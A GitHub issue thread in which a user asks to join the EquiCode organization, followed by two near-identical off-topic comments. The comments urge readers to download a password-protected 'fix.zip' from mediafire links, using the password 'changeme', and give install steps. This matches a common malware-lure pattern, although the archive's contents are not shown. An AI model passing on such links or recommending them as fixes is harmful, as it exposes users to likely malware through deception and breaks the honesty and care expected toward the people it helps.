### ISSUE TITLE
Invite me to the Equicode GitHub Organization

### ISSUE THREAD

**Issue by Mukku27** [EquiCode/Community-Support#57]
I’m excited about the opportunity to join the EquiCode GitHub Organization. I believe in the mission of promoting diversity, inclusion, and equitable opportunities within the tech industry. By being part of this community, I hope to contribute to open-source projects, collaborate with like-minded individuals, and help drive positive change in the tech space. I’m eager to learn from others, share my knowledge, and be an active member of this wholesome and inclusive community.

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
